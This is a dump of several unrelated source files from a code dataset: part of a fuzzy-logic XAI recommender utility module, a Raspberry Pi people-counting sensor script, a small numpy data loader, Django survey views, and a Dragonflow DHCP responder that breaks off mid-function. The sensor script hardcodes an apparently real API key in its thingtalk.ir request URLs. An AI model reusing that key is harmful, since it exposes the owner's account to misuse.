d: SimpleNamespace(**d))\n return __config\n\n\ndef get_ante_config(config_file=ANTE_CONFIG_FILE, reload=False):\n \"\"\"\n Loads antecedent config. If no config file is available yet,\n initial config file gets recreated from python config file.\n\n @param config_file: antecedent config file path (default: \"./resources/config/antecedent_config.json\")\n @param reload: whether or not to reload config file (default: False)\n\n @returns config as namespace\n \"\"\"\n global __ante_config\n config_file = config_file if config_file is not None else ANTE_CONFIG_FILE\n if __ante_config is None or config_file != ANTE_CONFIG_FILE or reload:\n try:\n with open(config_file) as f:\n __ante_config = json.load(f)\n except FileNotFoundError:\n # if file is deleted, generate new one from convenience file (default antecedents!!)\n from resources.config.antecedent_config import antecedents as ac\n # if no json file of ante_config is available, generate from antecedent_config.py\n with open(config_file, 'w') as fp:\n json.dump(ac, fp)\n __ante_config = ac\n return __ante_config\n\n\ndef plot_membership(var_name, x, mfx, save=False):\n \"\"\"\n Plot membership function.\n Defuzzification of a membership function, returning a defuzzified value of the function at x, using various \n defuzzification methods (COG,MOM,SOM,LOM)\n\n @param var_name: Name of variable\n @param x: Independent variable (1d array or iterable, length N)\n @param mfx: Fuzzy membership function (1d array of iterable, length N)\n \n \"\"\"\n # Defuzzify this membership function five ways\n print(\"--- \", var_name, \", x: \", x, \" mfx: \", mfx)\n defuzz_centroid = fuzz.defuzz(x, mfx, 'centroid') # Same as skfuzzy.centroid\n # defuzz_bisector = fuzz.defuzz(x, mfx, 'bisector')\n defuzz_mom = fuzz.defuzz(x, mfx, 'mom')\n defuzz_som = fuzz.defuzz(x, mfx, 'som')\n defuzz_lom = fuzz.defuzz(x, mfx, 'lom')\n\n # Collect info for vertical lines\n # labels = ['centroid', 'bisector', 'mean of maximum', 'min of maximum', 'max of maximum']\n labels = ['COG', 'Mean of Maximum', 'Min of Maximum', 'Max of Maximum']\n xvals = [defuzz_centroid,\n # defuzz_bisector,\n defuzz_mom,\n defuzz_som,\n defuzz_lom]\n colors = [\"b\", \"g\", \"r\", \"y\", \"m\"]\n ymax = [fuzz.interp_membership(x, mfx, i) for i in xvals]\n\n # Display and compare defuzzification results against membership function\n plt.figure(figsize=(8, 4))\n\n plt.plot(x, mfx, 'k')\n for xv, y, label, color in zip(xvals, ymax, labels, colors):\n plt.vlines(xv, 0, y, label=label, color=color)\n plt.ylabel('Zugehörigkeitswert')\n plt.xlabel('Diskursuniversum ({})'.format(var_name))\n #plt.ylabel('Fuzzy membership')\n #plt.xlabel('Universe variable ({})'.format(var_name))\n #plt.ylim(-0.1, 1.1)\n plt.legend(loc=2)\n\n if save:\n plt.savefig(f\"./../defuzz_{var_name}.png\",dpi=300)\n\n plt.show()\n\n\ndef get_logger(name, activate_console_logs=True, log_file=get_config().resource_files.log_file, log_level=logging.INFO):\n '''\n Returns logger which logs to console on a specified level\n\n @param activate_console_logs: If true, logs are also printed in the console. Default: True\n @param log_file: File to write logs to. Default: config.resource_files.log_file\n @param log_level: Level of which to log events\n\n @returns Logger\n '''\n logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n rootLogger = logging.getLogger(name)\n\n fileHandler = logging.FileHandler(log_file)\n fileHandler.setFormatter(logFormatter)\n fileHandler.setLevel(log_level)\n rootLogger.addHandler(fileHandler)\n\n if activate_console_logs:\n consoleHandler = logging.StreamHandler() # (sys.stdout)\n consoleHandler.setFormatter(logFormatter)\n consoleHandler.setLevel(log_level)\n rootLogger.addHandler(consoleHandler)\n rootLogger.setLevel(logging.DEBUG)\n\n return rootLogger\n\n\n############################ KNOWLEDGE AQUISITION ############################\n\ndef create_exclusion_criteria(name, label, help_txt, section, method_rating):\n \"\"\"\n Adds rating of criteria to dataframe and returns antecedent configuration\n to be added to ante_config\n Attention: Formulate Boolean criteria, that application of the method is\n possible when input variable >= Rating of method in dataframe\n\n @param name: name of criterion\n @param label: label of criterion\n @param help_txt: help text\n @param section: section to display criterion in\n @param method_rating: Rating for every available XAI-method (1d array, length of available methods)\n \"\"\"\n excl_criteria_df = pd.read_csv(get_config().resource_files.rating_bool, index_col=[0])\n assert len(method_rating) == len(\n excl_criteria_df.columns), f\"Length of given method ratings ({len(method_rating)}) doesn't match length of \" \\\n f\"rating dataframe ({len(excl_criteria_df.columns)})\"\n\n # add to boolean rating dataframe\n excl_criteria_df.loc[name] = method_rating\n # save dataframe back\n excl_criteria_df.to_csv(get_config().resource_files.rating_bool)\n\n return {\n \"label\": label,\n \"type\": \"exclusion_criteria\",\n \"dtypes\": {\n \"fuzzy\": \"bool\",\n \"crisp\": \"bool\"\n },\n \"frontend\": {\n \"type\": \"checkbox\",\n \"section\": section,\n \"help\": help_txt,\n \"initialValue\": True,\n \"rating\": \"bool\"\n }\n }\n\n\ndef add_method(name, label, visualization, exclusion_ratings, fuzzy_ratings):\n \"\"\"\n Add methods to backend application of XAIR\n\n @param name: name of method\n @param label: label to be displayed\n @param visualization: 1 if visualization method, 0 otherwise\n @param exclusion_ratings: 1d array of method rating regarding exclusion criteria (length: number of exclusion criteria)\n @param fuzzy_ratings: 1d array of method rating regarding fuzzy criteria (length: number of all possible fuzzy criteria levels)\n\n \"\"\"\n # add exclusion criteria rating\n excl_criteria_df = pd.read_csv(get_config().resource_files.rating_bool, index_col=[0])\n excl_criteria_df[label] = exclusion_ratings\n excl_criteria_df.to_csv(get_config().resource_files.rating_bool)\n\n # add fuzzy rating\n fuzzy_df = pd.read_csv(get_config().resource_files.rating_fuzzy, index_col=[0, 1])\n fuzzy_df[label] = fuzzy_ratings\n fuzzy_df.to_csv(get_config().resource_files.rating_fuzzy)\n\n # add to alternatives in config\n with open(get_config().resource_files.consequent_config) as f:\n c = json.load(f)\n c[name] = {'label': label,\n 'visualization': visualization}\n with open(get_config().resource_files.consequent_config, 'w') as fp:\n json.dump(c, fp)\n\n return True\n\n\ndef create_criteria(label,\n help_txt,\n crit_type,\n standalone_impact,\n disable_processing,\n section,\n input_type,\n rating,\n universe,\n mem_funcs,\n dtypes,\n init_value=None,\n max_value=None,\n min_value=None\n ):\n \"\"\"\n Create criterion JSON format from input values\n\n @retuns criterion JSON structure\n \"\"\"\n\n crit = {\"label\": label,\n \"universe\": universe,\n \"mem_funcs\": mem_funcs,\n \"rating\": list(rating.keys()),\n \"type\": crit_type,\n \"dtypes\": dtypes,\n \"rules\": {\n \"standalone_impact\": standalone_impact,\n \"disable_processing\": disable_processing\n },\n \"frontend\": {\n \"type\": input_type,\n \"section\": section,\n \"help\": help_txt,\n \"rating\": rating\n }}\n if input_type not in [\"list\", \"text\"]:\n assert init_value is not None, \"Initial value for frontend must be given for number/range inputs.\"\n assert max_value is not None, \"Max value for frontend must be given for number/range inputs.\"\n assert min_value is not None, f\"Min value for frontend must be given for number/range inputs. ({min_value})\"\n\n crit[\"frontend\"][\"initialValue\"] = init_value\n crit[\"frontend\"][\"max\"] = max_value\n crit[\"frontend\"][\"min\"] = min_value\n crit[\"frontend\"][\"range_min\"] = list(rating.values())[0]\n crit[\"frontend\"][\"range_max\"] = list(rating.values())[-1]\n\n return crit\n","repo_name":"viadee/xair","sub_path":"xai_xps/src/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":9849,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"10502866692","text":"import RPi.GPIO as GPIO\nimport time\nimport threading\nimport datetime\nfrom gpiozero import MotionSensor\nimport requests\nimport json\n\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(16, GPIO.OUT)\nipir = MotionSensor(4)\n\nGPIO.setup(27,GPIO.OUT)\nGPIO.setup(22,GPIO.IN)\nGPIO.setup(23,GPIO.OUT)\nGPIO.setup(24,GPIO.IN)\n\nhumans = 0\ncount = [0, 0]\nmo = False #lamp status\n\ndef sendtoserver():\n\tj = requests.get(\"http://thingtalk.ir/channels/118/feed.json?key=CSL9Y4UV0XPJSOB7\")\n\tpast = j.json()\n\ts = \"http://thingtalk.ir/update?key=CSL9Y4UV0XPJSOB7\"\n\ts += \"&field1=\"\n\ts += str(humans)\n\ts += \"&field2=\"\n\ts += str(int(mo))\n\tif(past[\"feeds\"] != []):\n\t\tx = past[\"feeds\"][len(past[\"feeds\"])-1] \n\t\tfor i in range(3,5):\n\t\t\ts += \"&field\"+str(i)+\"=\"+x[\"field\"+str(i)]\n\telse:\n\t\ts += \"&field3=0&field4=0\"\n\trequests.get(s)\n\n\t\t\t\t\t\t\n\ndef ultra( threadName, TRIG_04, ECHO_04\t):\n\t\n\tglobal humans\n\tglobal count\n\tprint (\"humans: \", humans)\n\ti = 0\n\tdefa = 0;\n\tstart = False\n\tpre = 0\n\twhile True:\n\n\t\tGPIO.output(TRIG_04, False)\n\t\ttime.sleep(0.2)\n\n\t\tGPIO.output(TRIG_04, True)\n\n\t\ttime.sleep(0.00001)\n \n\t\tGPIO.output(TRIG_04, False)\n \n\t\twhile GPIO.input(ECHO_04)==0:\n\t\t\tpulse_start = time.time()\n\n\t\twhile GPIO.input(ECHO_04)==1:\n\t\t\tpulse_end = time.time()\n\t\n\t\tpulse_duration = pulse_end - pulse_start\n\n\n\t\tdistance_04 = pulse_duration * 17150\n\t\tdistance_04 = round(distance_04, 2)\n\n\t\t#detecting human\n\t\tif((pre - distance_04) > 20):\n\t\t\tif(start):\n\t\t\t\tif((defa-distance_04) > 20):\n\t\t\t\t\tcount[int(threadName)] += 1\n\t\t\t\t\tif(count[0] == count[1]):\n\t\t\t\t\t\tif(threadName == \"0\"):\n\t\t\t\t\t\t\thumans -= 1\n\t\t\t\t\t\t\tif(humans < 0):\n\t\t\t\t\t\t\t\thumans = 0\n\t\t\t\t\t\t\t\tcount = [0,0]\n\t\t\t\t\t\t\tprint(\"-1\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\thumans += 1\n\t\t\t\t\t\t\tprint(\"+1\")\n\t\t\t\t\t\tsendtoserver()\n\n\t\tpre = distance_04\n\n\t\t#understand default distance\n\t\tif(i < 10):\n\t\t\tdefa += distance_04\n\t\telif(i == 10):\n\t\t\tstart = True\n\t\t\tdefa /= 10\n\t\t\tpre = defa\n\t\ti += 1\ntry:\n\tthreading.Thread(target=ultra, args=(\"0\", 23, 24, )).start()\n\tthreading.Thread(target=ultra, args=(\"1\", 27, 22, )).start()\nexcept:\n\tprint (\"Error: unable to start thread\")\t\t\n\ni = 0\ntry:\n\twhile True:\n\n\t\tif ((ipir.motion_detected) or (humans>0)):\n\t\t\ti = 0\n\t\t\tif(mo == False):\n\t\t\t\tmo = True\n\t\t\t\tsendtoserver()\n\t\t\tGPIO.output(16, True)\n\t\t\tif(humans <= 0):\n\t\t\t\tprint(datetime.datetime.now().time(), \"Motion detected!\")\n\t\tif((i == 17)):\n\t\t\ti = 0\n\t\t\tif(humans == 0):\n\t\t\t\tGPIO.output(16, False)\n\t\t\t\tif(mo):\n\t\t\t\t\tmo = False\n\t\t\t\t\tsendtoserver()\n\t\ti += 1\n\t\tprint(count)\n\t\ttime.sleep(0.3)\n\nexcept KeyboardInterrupt:\n\tprint(\"Errr\",humans,\"\\n\\n\\n\\n\\n\\n\")\n\tGPIO.cleanup()\n\n","repo_name":"SamanFekri/SmartSchool","sub_path":"Hardware/2ultrasonicwithpir.py","file_name":"2ultrasonicwithpir.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21651848906","text":"import os\nimport numpy as np\nimport matplotlib as plt\nimport sklearn\n\n#构建数据\ndef build_data():\n dirname=\"five/trainingDigits/\"\n trains = os.listdir(dirname)\n #放所有数据的大列表\n datalist = np.zeros((len(trains),1025))\n newlines=np.zeros((32,32))\n for train in trains:\n fileindex = 0\n with open(file=dirname+train,mode='r') as f:\n lineindex=0\n realnum = int(train[0:1])\n lines = f.readlines()\n for line in lines:\n intline = np.array([int(i) for i in line[0:32]])\n newlines[lineindex] = intline\n lineindex+=1\n datalist[fileindex,0:1] = realnum\n datalist[fileindex,1:] = newlines.ravel()\n fileindex+=1\n save_data(datalist)\n print()\n \n\ndef save_data(datalist):\n np.save('five/data/',datalist)\n\ndef load_data():\n train_data = np.load('five/data/train.npy')\n print(train_data)\ndef knndo():\n knn = KNeighborsClassifier(n_neighbors=5)\n knn.fit()\n\n#可视化数据\ndef view():\n #创建画布\n plt.figure()\n #绘图\n \n\nload_data()","repo_name":"Sirlanri/data-analysis","sub_path":"five/机器学习.py","file_name":"机器学习.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16809076877","text":"import random\nfrom django.contrib.auth.decorators import user_passes_test, login_required\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom functions import *\nfrom survey import models\nfrom teacher import models as teacher_view\n\n\ndef generateToken(request):\n return random.randint(100000, 999999)\n\n\ndef index(request):\n if request.POST:\n form = models.Form.objects.get(formName=request.POST['form'])\n mcqs = models.MCQ.objects.filter(form=form).filter(token__isnull=True)\n textViews = models.TextView.objects.filter(form=form).filter(token__isnull=True)\n token = models.Token.objects.get(tokenId=request.session.get('token'))\n for id, mcq in enumerate(mcqs):\n # token.mcq = mcq\n MCQ = models.MCQ()\n MCQ.token = models.Token.objects.get(tokenId=request.session.get('token'))\n MCQ.textName = mcq.textName\n MCQ.form = mcq.form\n # mcq.token = models.Token.objects.get(tokenId=request.session.get('token'))\n mcq_options = models.Options.objects.filter(mcq=mcq)\n # options.token = models.Token.objects.get(tokenId=request.session.get('token'))\n #print(request.POST[str(id)])\n o = mcq_options[int(request.POST[str(id)])]\n o.result += 1\n o.save()\n print(str(id) + ':' + str(o.result))\n MCQ.save()\n for id, textView in enumerate(textViews):\n # token.textview = textView\n TextView = models.TextView()\n TextView.textName = textView.textName\n TextView.form = textView.form\n TextView.token = models.Token.objects.get(tokenId=request.session.get('token'))\n # textView.token = models.Token.objects.get(tokenId=request.session.get('token'))\n TextView.result = request.POST[textView.textName]\n TextView.save()\n token.form = form\n token.survey = form.survey\n token.save()\n # form.token = models.Token.objects.get(tokenId=request.session.get('token'))\n # form.save(force_update=True)\n semesters = teacher_view.Semester.objects.all()\n primaryKey = []\n for semester in semesters:\n primaryKey.append(semester.pk)\n zipped_data = zip(semesters, primaryKey)\n context = {\n 'zippedData': zipped_data,\n 'token' : request.session.get('token')\n }\n return render(request, 'student/index.html', context)\n\n\ndef allFroms(request, sem):\n forms = models.Form.objects.filter(semester=models.Semester.objects.get(pk=int(sem))).filter()\n primaryKey = []\n for form in forms:\n primaryKey.append(form.pk)\n zipped_data = zip(forms, primaryKey)\n context = {\n 'zippedData': zipped_data,\n 'token' : request.session.get('token')\n }\n return render(request, 'student/form.html', context)\n\n\ndef formFill(request, formId):\n form = models.Form.objects.get(pk=int(formId))\n mcqs = models.MCQ.objects.filter(form=form).filter(token__isnull=True)\n textView = models.TextView.objects.filter(form=form).filter(token__isnull=True)\n options = []\n for mcq in mcqs:\n options.append({'mcq': mcq, 'options': models.Options.objects.filter(mcq=mcq)})\n\n context = {\n 'form': form,\n 'options': options,\n 'textView': textView,\n 'token' : request.session.get('token')\n }\n return render(request, 'student/formfill.html', context)\n","repo_name":"bineeth923/FES","sub_path":"student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"18789083574","text":"import collections\nimport copy\nimport functools\nimport math\nimport struct\n\nfrom neutron.conf import common as common_config\nfrom neutron_lib import constants as n_const\nfrom os_ken.lib import addrconv\nfrom os_ken.lib.packet import dhcp\nfrom os_ken.lib.packet import ethernet\nfrom os_ken.lib.packet import ipv4\nfrom os_ken.lib.packet import packet as os_ken_packet\nfrom os_ken.lib.packet import udp\nfrom os_ken.ofproto import ether\nfrom oslo_log import log\n\nfrom dragonflow.common import utils as df_utils\nfrom dragonflow import conf as cfg\nfrom dragonflow.controller.common import arp_responder\nfrom dragonflow.controller.common import constants as const\nfrom dragonflow.controller.common import icmp_responder\nfrom dragonflow.controller import df_base_app\nfrom dragonflow.db.models import constants as model_constants\nfrom dragonflow.db.models import host_route\nfrom dragonflow.db.models import l2\n\nLOG = log.getLogger(__name__)\n\n\nclass DHCPApp(df_base_app.DFlowApp):\n def __init__(self, *args, **kwargs):\n super(DHCPApp, self).__init__(*args, **kwargs)\n self.idle_timeout = 30\n self.hard_timeout = 0\n\n cfg.CONF.register_opts(common_config.core_opts)\n self.conf = cfg.CONF.df_dhcp_app\n\n self.global_dns_list = self.conf.df_dns_servers\n self.lease_time = cfg.CONF.dhcp_lease_duration\n self.domain_name = cfg.CONF.dns_domain\n self.block_hard_timeout = self.conf.df_dhcp_block_time_in_sec\n self.default_interface_mtu = self.conf.df_default_network_device_mtu\n self._port_rate_limiters = collections.defaultdict(\n functools.partial(df_utils.RateLimiter,\n max_rate=self.conf.df_dhcp_max_rate_per_sec,\n time_unit=1))\n self.api.register_table_handler(const.DHCP_TABLE,\n self.packet_in_handler)\n self._dhcp_ip_by_subnet = {}\n\n def _get_dhcp_port_by_network(self, network_unique_key):\n\n lswitch = self.db_store.get_one(l2.LogicalSwitch(\n unique_key=network_unique_key),\n index=l2.LogicalSwitch.get_index('unique_key'))\n\n return self.db_store.get_one(\n l2.LogicalPort(\n device_owner=n_const.DEVICE_OWNER_DHCP,\n lswitch=lswitch\n ),\n index=l2.LogicalPort.get_index('switch,owner')\n )\n\n def switch_features_handler(self, ev):\n self._install_dhcp_packet_match_flow()\n self.add_flow_go_to_table(const.DHCP_TABLE,\n const.PRIORITY_DEFAULT,\n const.L2_LOOKUP_TABLE)\n self._port_rate_limiters.clear()\n\n def _check_port_limit(self, lport):\n\n port_rate_limiter = self._port_rate_limiters[lport.id]\n\n return port_rate_limiter()\n\n def packet_in_handler(self, event):\n msg = event.msg\n\n pkt = os_ken_packet.Packet(msg.data)\n pkt_ip = pkt.get_protocol(ipv4.ipv4)\n\n if not pkt_ip:\n LOG.error(\"No support for non IPv4 protocol\")\n return\n\n unique_key = msg.match.get('reg6')\n lport = self.db_store.get_one(\n l2.LogicalPort(unique_key=unique_key),\n index=l2.LogicalPort.get_index('unique_key'),\n )\n\n network_key = msg.match.get('metadata')\n dhcp_lport = self._get_dhcp_port_by_network(network_key)\n if not dhcp_lport:\n LOG.error(\"No DHCP port for network {}\".format(str(network_key)))\n return\n\n if self._check_port_limit(lport):\n self._block_port_dhcp_traffic(unique_key, lport)\n LOG.warning(\"pass rate limit for %(port_id)s blocking DHCP \"\n \"traffic for %(time)s sec\",\n {'port_id': lport.id,\n 'time': self.block_hard_timeout})\n return\n\n if not self.db_store.get_one(lport):\n LOG.error(\"Port %s no longer found.\", lport.id)\n return\n try:\n self._handle_dhcp_request(pkt, lport, dhcp_lport)\n except Exception:\n LOG.exception(\"Unable to handle packet %s\", msg)\n\n def _handle_dhcp_request(self, packet, lport, dhcp_port):\n dhcp_packet = packet.get_protocol(dhcp.dhcp)\n dhcp_message_type = self._get_dhcp_message_type_opt(dhcp_packet)\n send_packet = None\n if dhcp_message_type == dhcp.DHCP_DISCOVER:\n send_packet = self._create_dhcp_response(\n packet,\n dhcp_packet,\n dhcp.DHCP_OFFER,\n lport,\n dhcp_port)\n LOG.info(\"sending DHCP offer for port IP %(port_ip)s \"\n \"port id %(port_id)s\",\n {'port_ip': lport.ip, 'port_id': lport.id})\n elif dhcp_message_type == dhcp.DHCP_REQUEST:\n send_packet = self._create_dhcp_response(\n packet,\n dhcp_packet,\n dhcp.DHCP_ACK,\n lport,\n dhcp_port)\n LOG.info(\"sending DHCP ACK for port IP %(port_ip)s \"\n \"port id %(tunnel_id)s\",\n {'port_ip': lport.ip,\n 'tunnel_id': lport.id})\n else:\n LOG.error(\"DHCP message type %d not handled\",\n dhcp_message_type)\n if send_packet:\n unique_key = lport.unique_key\n self.dispatch_packet(send_packet, unique_key)\n\n def _create_dhcp_response(self, packet, dhcp_request,\n response_type, lport, dhcp_port):\n pkt_ipv4 = packet.get_protocol(ipv4.ipv4)\n pkt_ethernet = packet.get_protocol(ethernet.ethernet)\n\n try:\n subnet = lport.subnets[0]\n except IndexError:\n LOG.warning(\"No subnet found for port %s\", lport.id)\n return\n\n dhcp_server_address = self._dhcp_ip_by_subnet.get(subnet.id)\n if not dhcp_server_address:\n LOG.warning(\"Could not find DHCP server address for subnet %s\",\n subnet.id)\n return\n\n option_list = self._build_dhcp_options(dhcp_request,\n response_type,\n lport,\n subnet,\n dhcp_server_address)\n\n options = dhcp.options(option_list=option_list)\n\n dhcp_response = os_ken_packet.Packet()\n dhcp_response.add_protocol(ethernet.ethernet(\n ethertype=ether.ETH_TYPE_IP,\n dst=pkt_ethernet.src,\n src=dhcp_port.mac))\n dhcp_response.add_protocol(ipv4.ipv4(dst=pkt_ipv4.src,\n src=dhcp_server_address,\n proto=pkt_ipv4.proto))\n dhcp_response.add_protocol(udp.udp(src_port=const.DHCP_SERVER_PORT,\n dst_port=const.DHCP_CLIENT_PORT))\n\n siaddr = lport.dhcp_params.siaddr or dhcp_server_address\n\n dhcp_response.add_protocol(dhcp.dhcp(op=dhcp.DHCP_BOOT_REPLY,\n chaddr=pkt_ethernet.src,\n siaddr=siaddr,\n boot_file=dhcp_request.boot_file,\n yiaddr=lport.ip,\n xid=dhcp_request.xid,\n options=options))\n return dhcp_response\n\n def _build_dhcp_options(self, dhcp_request, response_type,\n lport, subnet, srv_addr):\n \"\"\"\n according the RFC the server need to response with\n with all the option that \"explicitly configured options\"\n and supply as many of the \"requested parameters\" as\n possible\n\n https://www.ietf.org/rfc/rfc2131.txt (page 29)\n \"\"\"\n\n # explicitly configured options\n default_opts = self._build_response_default_options(response_type,\n lport, subnet,\n srv_addr)\n\n # requested options (according to dhcp_params.opt)\n response_opts = self._build_response_requested_options(dhcp_request,\n lport,\n default_opts)\n\n response_opts.update(default_opts)\n\n option_list = [dhcp.option(tag, value)\n for tag, value in response_opts.items()]\n\n return option_list\n\n def _build_response_default_options(self, response_type, lport,\n subnet, srv_addr):\n options_dict = {}\n pkt_type_packed = struct.pack('!B', response_type)\n dns = self._get_dns_address_list_bin(subnet)\n host_routes = self._get_host_routes_list_bin(subnet, lport)\n\n server_addr_bin = srv_addr.packed\n netmask_bin = subnet.cidr.netmask.packed\n domain_name_bin = struct.pack('!%ss' % len(self.domain_name),\n self.domain_name.encode())\n lease_time_bin = struct.pack('!I', self.lease_time)\n\n options_dict[dhcp.DHCP_MESSAGE_TYPE_OPT] = pkt_type_packed\n options_dict[dhcp.DHCP_SUBNET_MASK_OPT] = netmask_bin\n options_dict[dhcp.DHCP_IP_ADDR_LEASE_TIME_OPT] = lease_time_bin\n options_dict[dhcp.DHCP_SERVER_IDENTIFIER_OPT] = server_addr_bin\n options_dict[dhcp.DHCP_DNS_SERVER_ADDR_OPT] = dns\n options_dict[dhcp.DHCP_DOMAIN_NAME_OPT] = domain_name_bin\n options_dict[dhcp.DHCP_CLASSLESS_ROUTE_OPT] = host_routes\n\n gw_ip = self._get_port_gateway_address(subnet, lport)\n if gw_ip:\n gw_ip_bin = gw_ip.packed\n options_dict[dhcp.DHCP_GATEWAY_ADDR_OPT] = gw_ip_bin\n\n if response_type == dhcp.DHCP_ACK:\n interface_mtu = self._get_port_mtu(lport)\n mtu_bin = struct.pack('!H', interface_mtu)\n options_dict[dhcp.DHCP_INTERFACE_MTU_OPT] = mtu_bin\n\n return options_dict\n\n def _build_response_requested_options(self, dhcp_request,\n lport, default_opts):\n options_dict = {}\n req_list_opt = dhcp.DHCP_PARAMETER_REQUEST_LIST_OPT\n requested_opts = self._get_dhcp_option_by_tag(dhcp_request,\n req_list_opt)\n if not requested_opts:\n return {}\n\n for opt in requested_opts:\n # For python3 opt is already int.\n if isinstance(opt, str):\n opt_int = ord(opt)\n else:\n opt_int = opt\n\n if opt_int in default_opts:\n # already answered by the default options\n continue\n\n value = lport.dhcp_params.opts.get(opt_int)\n if value:\n value_bin = struct.pack('!%ss' % len(value),\n value.encode())\n options_dict[opt_int] = value_bin\n\n return options_dict\n\n def _get_dns_address_list_bin(self, subnet):\n dns_servers = self.global_dns_list\n if len(subnet.dns_nameservers) > 0:\n dns_servers = subnet.dns_nameservers\n dns_bin = b''\n for address in dns_servers:\n dns_bin += addrconv.ipv4.text_to_bin(address)\n return dns_bin\n\n def _get_host_routes_list_bin(self, subnet, lport):\n host_routes = copy.copy(subnet.host_routes)\n if self.conf.df_add_link_local_route:\n # Add route for metadata request.\n host_routes.append(host_route.HostRoute(\n destination='%s/32' % const.METADATA_SERVICE_IP,\n nexthop=lport.ip))\n\n routes_bin = b''\n opt = lport.dhcp_params.opts.get(dhcp.DHCP_CLASSLESS_ROUTE_OPT)\n if opt:\n dest_cidr, _c, via = opt.partition(',')\n host_routes.append(\n host_route.HostRoute(destination=dest_cidr,\n nexthop=via))\n\n # We must add the default route here. if a host supports classless\n # route options, it must ignore the router option\n gateway = self._get_port_gateway_address(subnet, lport)\n if gateway is not None:\n host_routes.append(\n host_route.HostRoute(\n destination='0.0.0.0/0',\n nexthop=gateway,\n ),\n )\n\n for route in host_routes:\n dest = route.destination.network\n mask = route.destination.prefixlen\n routes_bin += struct.pack('B', mask)\n \"\"\"\n for compact encoding\n Width of subnet mask Number of significant octets\n 0 0\n 1- 8 1\n 9-16 2\n 17-24 3\n 25-32 4\n \"\"\"\n addr_bin = addrconv.ipv4.text_to_bin(dest)\n dest_len = int(math.ceil(mask / 8.0))\n routes_bin += addr_bin[:dest_len]\n routes_bin += addrconv.ipv4.text_to_bin(route.nexthop)\n\n return routes_bin\n\n def _get_dhcp_option_by_tag(self, dhcp_packet, tag):\n if dhcp_packet.options:\n for opt in dhcp_packet.options.option_list:\n if opt.tag == tag:\n return opt.value\n\n def _get_dhcp_message_type_opt(self, dhcp_packet):\n opt_value = self._get_dhcp_option_by_tag(dhcp_packet,\n dhcp.DHCP_MESSAGE_TYPE_OPT)\n if opt_value:\n return ord(opt_value)\n\n def _get_port_gateway_address(self, subnet, lport):\n gateway_ip = subnet.gateway_ip\n if gateway_ip:\n return gateway_ip\n return lport.dhcp_params.opts.get(dhcp.DHCP_GATEWAY_ADDR_OPT)\n\n def _get_port_mtu(self, lport):\n # get network mtu from lswitch\n lswitch = lport.lswitch\n mtu = lswitch.mtu\n if mtu:\n return mtu\n return self.default_interface_mtu\n\n def _install_dhcp_classification_flow(self):\n parser = self.parser\n\n match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,\n ip_proto=n_const.PROTO_NUM_UDP,\n udp_src=const.DHCP_CLIENT_PORT,\n udp_dst=const.DHCP_SERVER_PORT)\n\n self.add_flow_go_to_table(const.SERVICES_CLASSIFICATION_TABLE,\n const.PRIORITY_MEDIUM,\n const.DHCP_TABLE, match=match)\n\n def _block_port_dhcp_traffic(self, unique_key, lport):\n match = self.parser.OFPMatch(reg6=unique_key)\n drop_inst = None\n self.mod_flow(\n inst=drop_inst,\n priority=const.PRIORITY_VERY_HIGH,\n hard_timeout=self.block_hard_timeout,\n table_id=const.DHCP_TABLE,\n match=match)\n\n def _install_dhcp_packet_match_flow(self):\n parser = self.parser\n\n match = parser.OFPMatch(eth_type=ether.ETH_TYPE_IP,\n ip_proto=n_const.PROTO_NUM_UDP,\n udp_src=const.DHCP_CLIENT_PORT,\n udp_dst=const.DHCP_SERVER_PORT)\n\n self.add_flow_go_to_table(const.SERVICES_CLASSIFICATION_TABLE,\n const.PRIORITY_MEDIUM,\n const.DHCP_TABLE, match=match)\n\n def _install_dhcp_port_flow(self, lswitch):\n parser = self.parser\n ofproto = self.ofproto\n match = parser.OFPMatch(metadata=lswitch.unique_key)\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n self.mod_flow(\n inst=inst,\n table_id=const.DHCP_TABLE,\n priority=const.PRIORITY_MEDIUM,\n match=match)\n\n def _remove_dhcp_network_flow(self, lswitch):\n parser = self.parser\n ofproto = self.ofproto\n match = parser.OFPMatch(metadata=lswitch.unique_key)\n self.mod_flow(\n table_id=const.DHCP_TABLE,\n command=ofproto.OFPFC_DELETE,\n priority=const.PRIORITY_MEDIUM,\n match=match)\n\n def _add_dhcp_ips_by_subnet(self, lport):\n subnet_ids = (subnet.id for subnet in lport.subnets)\n self._dhcp_ip_by_subnet.update(dict(zip(subnet_ids, lport.ips)))\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_CREATED)\n def _lport_created(self, lport):\n if lport.device_owner != n_const.DEVICE_OWNER_DHCP:\n return\n\n self._install_dhcp_port_responders(lport)\n self._install_dhcp_port_flow(lport.lswitch)\n\n self._add_dhcp_ips_by_subnet(lport)\n\n def _update_port_responders(self, lport, orig_lport):\n self._uninstall_dhcp_port_responders(orig_lport)\n self._install_dhcp_port_responders(lport)\n\n def _update_dhcp_ips_by_subnet(self, lport, orig_lport):\n\n self._add_dhcp_ips_by_subnet(lport)\n\n orig_subnets = set(subnet.id for subnet in orig_lport.subnets)\n new_subnets = set(subnet.id for subnet in lport.subnets)\n\n deleted_subnets = orig_subnets - new_subnets\n for subnet_id in deleted_subnets:\n del self._dhcp_ip_by_subnet[subnet_id]\n\n def _delete_lport_rate_limiter(self, lport):\n if not lport.is_local:\n return\n\n if lport.id in self._port_rate_limiters:\n del self._port_rate_limiters[lport.id]\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_UPDATED)\n def _lport_updated(self, lport, orig_lport):\n if lport.device_owner != n_const.DEVICE_OWNER_DHCP:\n return\n\n v4_ips 